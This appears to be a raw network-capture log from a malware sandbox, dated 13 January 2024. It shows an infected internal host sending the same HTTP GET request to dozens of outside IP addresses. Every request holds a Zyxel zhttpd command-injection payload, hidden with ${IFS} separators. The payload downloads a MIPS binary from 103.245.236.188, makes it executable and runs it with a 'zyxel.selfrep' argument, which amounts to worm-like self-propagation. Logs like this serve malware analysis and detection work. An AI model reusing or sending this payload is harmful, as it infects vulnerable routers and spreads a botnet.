                                    Jan 13, 2024 19:02:24.960130930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2263192.168.2.1357512166.183.68.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.960196972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2264192.168.2.134431287.14.159.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.960258007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2265192.168.2.134359623.112.126.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.963150978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2266192.168.2.135947831.233.197.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.963177919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2267192.168.2.13515689.193.73.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.963232040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2268192.168.2.1358404171.167.6.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.963251114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2269192.168.2.135535852.62.240.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.963283062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2270192.168.2.1360820205.243.100.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980675936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2271192.168.2.134159853.138.14.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980696917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2272192.168.2.135237819.116.209.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980731964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2273192.168.2.134274265.230.237.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980753899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2274192.168.2.135339271.246.144.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980818987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2275192.168.2.133824478.170.1.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980843067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2276192.168.2.1346088158.79.220.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980891943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2277192.168.2.134861234.138.106.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980947018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2278192.168.2.136007265.207.181.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.980978966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2279192.168.2.1334058165.182.235.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981018066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2280192.168.2.133798274.117.16.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981054068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2281192.168.2.1358498187.28.132.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981081009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2282192.168.2.134627861.150.158.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981098890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2283192.168.2.1335156159.169.67.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981142044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2284192.168.2.1351316102.88.135.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981178999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2285192.168.2.134780049.59.147.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981226921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2286192.168.2.1346920164.198.235.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981266975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2287192.168.2.1337390198.106.45.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981295109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2288192.168.2.1342724139.239.224.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981347084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2289192.168.2.1335904118.230.96.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981398106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2290192.168.2.1334702200.244.229.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981420994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2291192.168.2.135559489.0.74.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981446028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2292192.168.2.134060840.177.168.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981497049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2293192.168.2.133526274.237.80.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981540918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2294192.168.2.134309475.156.74.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981578112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2295192.168.2.1352924151.165.135.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981620073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2296192.168.2.1343124132.158.1.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981661081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2297192.168.2.133649812.26.43.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981717110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2298192.168.2.135087644.73.37.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981755972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2299192.168.2.1352582144.218.133.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981786013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2300192.168.2.1349226148.107.230.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981807947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2301192.168.2.1355382144.10.36.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981843948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2302192.168.2.1350790109.133.63.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981872082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2303192.168.2.1360542143.19.1.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981919050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2304192.168.2.1335278155.66.87.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981945038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2305192.168.2.1357870155.159.98.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.981993914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2306192.168.2.1336312172.216.17.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982044935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2307192.168.2.1352742210.169.133.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982057095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2308192.168.2.1354254103.9.112.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982090950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2309192.168.2.134685290.2.47.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982126951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2310192.168.2.1333986198.141.218.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982181072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2311192.168.2.135874474.67.181.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982214928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2312192.168.2.1343882142.203.21.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982249975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2313192.168.2.136062665.153.30.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982283115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2314192.168.2.135924291.187.220.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982322931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2315192.168.2.133885692.124.155.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982376099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2316192.168.2.134358641.193.201.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982409000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2317192.168.2.1347444174.70.212.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982449055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2318192.168.2.1355148139.23.209.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982479095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2319192.168.2.134669646.119.108.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982506037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2320192.168.2.1332960149.97.186.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982527018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2321192.168.2.1336344205.19.252.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982574940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2322192.168.2.134381899.27.156.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982604027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2323192.168.2.1345456198.100.48.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982646942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2324192.168.2.133467066.58.241.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.982681036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2325192.168.2.133480238.68.247.113443
                                    TimestampBytes transferredDirectionData
